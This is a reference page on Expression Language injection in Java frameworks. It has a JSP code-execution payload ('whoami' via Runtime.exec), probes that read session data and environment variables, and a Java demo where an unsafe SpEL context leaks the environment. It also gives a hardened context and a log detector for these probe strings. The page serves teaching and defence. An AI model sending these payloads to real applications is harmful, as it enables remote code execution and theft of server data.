Expression Language Injection

Expression Language Injection (EL Injection) is a class of vulnerabilities in which attacker-controlled input is evaluated by an expression language used by a web framework. These languages are designed to read object properties and call methods, so whenever user input is treated as an expression rather than as plain data, the evaluator becomes a direct route to server-side objects and, frequently, to code execution.

Common Expression Languages

  • JSP/JSF EL: Java EE unified expression language
  • SpEL: Spring Expression Language
  • OGNL: Object-Graph Navigation Language (Struts)
  • MVEL: MVFLEX Expression Language
  • JEXL: Java Expression Language

JSP/JSF EL Example

<!-- Vulnerable: the parameter value reaches the EL evaluator (e.g. it is evaluated again as an expression) -->
${param.input}

<!-- Payload to execute code -->
${Runtime.getRuntime().exec('whoami')}

<!-- Access session/application objects -->
${applicationScope}
${sessionScope.user.password}
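The same contrast between a vulnerable and a hardened evaluation is easiest to show in SpEL, which exposes its evaluation context as an object. The following is an added example, not code from the original page or from Spring; it assumes spring-expression (Spring 5.x or later) on the classpath, and the class, method and `Greeting` root-object names are hypothetical. The probe string is the SpEL identification expression from the Detection section of this page.

```java
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

// Added example (not from the original page): the same user input evaluated
// under the full SpEL context and under the restricted one. Class and method
// names are hypothetical; the Spring types are real.
public class SpelInjectionDemo {

    // Hypothetical root object: the data the application means to expose to expressions.
    public static class Greeting {
        private final String name;
        public Greeting(String name) { this.name = name; }
        public String getName() { return name; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Vulnerable pattern: user-controlled text is parsed as an expression and
    // evaluated with StandardEvaluationContext, which permits T() type
    // references, constructors, bean references and arbitrary method calls.
    public static Object evaluateUnsafe(String userInput, Object root) {
        Expression expr = PARSER.parseExpression(userInput);
        return expr.getValue(new StandardEvaluationContext(root));
    }

    // Hardened pattern: same parser, but SimpleEvaluationContext in read-only
    // data-binding mode resolves only public properties of the root object.
    // Its type locator rejects every T(...) reference and no MethodResolver
    // is registered, so both the type reference and the method call fail.
    public static Object evaluateRestricted(String userInput, Object root) {
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        Expression expr = PARSER.parseExpression(userInput);
        return expr.getValue(ctx, root);
    }

    public static void main(String[] args) {
        Greeting root = new Greeting("alice");
        String benign = "name";                          // what the feature is meant to accept
        String probe = "T(java.lang.System).getenv()";   // SpEL identification probe from the Detection section

        System.out.println("unsafe/benign:     " + evaluateUnsafe(benign, root));
        Object leaked = evaluateUnsafe(probe, root);
        System.out.println("unsafe/probe:      returned a " + leaked.getClass().getSimpleName()
                + " holding the process environment, i.e. injection succeeded");

        System.out.println("restricted/benign: " + evaluateRestricted(benign, root));
        try {
            evaluateRestricted(probe, root);
            System.out.println("restricted/probe:  NOT blocked (unexpected)");
        } catch (SpelEvaluationException e) {
            System.out.println("restricted/probe:  blocked: " + e.getMessage());
        }
    }
}
```

The restricted context limits the blast radius when an expression must be built from untrusted data; the stronger fix is not to pass user input to the parser at all and to bind it as a variable or property value instead. The same principle applies to the JSP/JSF example above: keep user input on the data side of the evaluator.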

Detection

# Test for EL evaluation
${7*7}           # Returns 49 if evaluated
#{7*7}           # Deferred-evaluation syntax (JSP 2.1+/JSF)
%{7*7}           # OGNL syntax

# Identify the engine
${T(java.lang.System).getenv()}  # SpEL
%{#context}                        # OGNL
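From the defender's side, the same probe strings are what to look for in request logs. The following detector is an added example, not part of the original page: it percent-decodes each line leniently, reports the three evaluation markers and the engine fingerprints listed above, and handles the case where a raw OGNL `%{...}` marker is not valid percent-encoding. The class name, the patterns and the access-log lines are constructed for illustration and cover only the probes this page names.

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example (not from the original page): flags the probe strings from the
// Detection section in request logs. Class name, patterns and log lines are
// constructed for illustration.
public class ElProbeDetector {

    // One of the three evaluation markers with a non-empty body: ${...}, #{...}, %{...}
    private static final Pattern EL_MARKER = Pattern.compile("[$#%]\\{[^}]+\\}");

    // Engine fingerprints and object reaches named on the page: the SpEL
    // T(java...) type reference, the OGNL #context reference, the JSP scope maps.
    private static final Pattern ENGINE_TOKEN = Pattern.compile(
            "T\\(\\s*java\\.|#context|applicationScope|sessionScope|getRuntime\\(");

    public static final class Finding {
        public final int lineNumber;
        public final String matched;
        public final String reason;
        Finding(int lineNumber, String matched, String reason) {
            this.lineNumber = lineNumber;
            this.matched = matched;
            this.reason = reason;
        }
        @Override public String toString() {
            return "line " + lineNumber + ": " + reason + " -> " + matched;
        }
    }

    // Decode %XX sequences but leave malformed ones alone. java.net.URLDecoder
    // throws on a raw OGNL marker such as %{7*7} (the '%' is not followed by
    // two hex digits), which would hide everything else on that line.
    static String lenientPercentDecode(String s) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c == '%' && i + 2 < s.length()
                    && Character.digit(s.charAt(i + 1), 16) >= 0
                    && Character.digit(s.charAt(i + 2), 16) >= 0) {
                out.write(Integer.parseInt(s.substring(i + 1, i + 3), 16));
                i += 2;
            } else {
                byte[] b = String.valueOf(c).getBytes(StandardCharsets.UTF_8);
                out.write(b, 0, b.length);
            }
        }
        return new String(out.toByteArray(), StandardCharsets.UTF_8);
    }

    public static List<Finding> scan(List<String> logLines) {
        List<Finding> findings = new ArrayList<>();
        for (int i = 0; i < logLines.size(); i++) {
            String decoded = lenientPercentDecode(logLines.get(i));
            boolean hit = false;
            Matcher m = EL_MARKER.matcher(decoded);
            while (m.find()) {
                hit = true;
                String expr = m.group();
                String reason = ENGINE_TOKEN.matcher(expr).find()
                        ? "engine fingerprint or server object access"
                        : "expression marker (possible evaluation probe)";
                findings.add(new Finding(i + 1, expr, reason));
            }
            // SpEL is often evaluated without ${} wrappers, so also check bare tokens.
            Matcher t = ENGINE_TOKEN.matcher(decoded);
            if (!hit && t.find()) {
                findings.add(new Finding(i + 1, t.group(), "engine fingerprint outside an EL marker"));
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed access-log lines; hosts, paths and timestamps are fictitious.
        List<String> sample = Arrays.asList(
            "10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] \"GET /search?q=%24%7B7*7%7D HTTP/1.1\" 200 512",
            "10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] \"GET /search?q=%25%7B%23context%7D HTTP/1.1\" 200 512",
            "10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] \"GET /search?q=%{7*7} HTTP/1.1\" 400 0",
            "10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] \"GET /profile?name=alice HTTP/1.1\" 200 1024",
            "10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] \"POST /expr HTTP/1.1\" 200 64 body=T(java.lang.System).getenv()"
        );
        for (Finding f : scan(sample)) {
            System.out.println(f);
        }
    }
}
```

Treat a `${7*7}`-style marker as a hunting lead rather than proof of exploitation: the tell of a real finding is the application responding with `49` (or the echoed value changing), which the log scanner cannot see on its own. Legitimate template text in referrers or user-supplied content will trip the marker pattern, so the engine-fingerprint findings are the ones to triage first.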

Impact

  • Remote code execution
  • Access to server-side objects and data
  • Authentication bypass
  • Information disclosure

See Also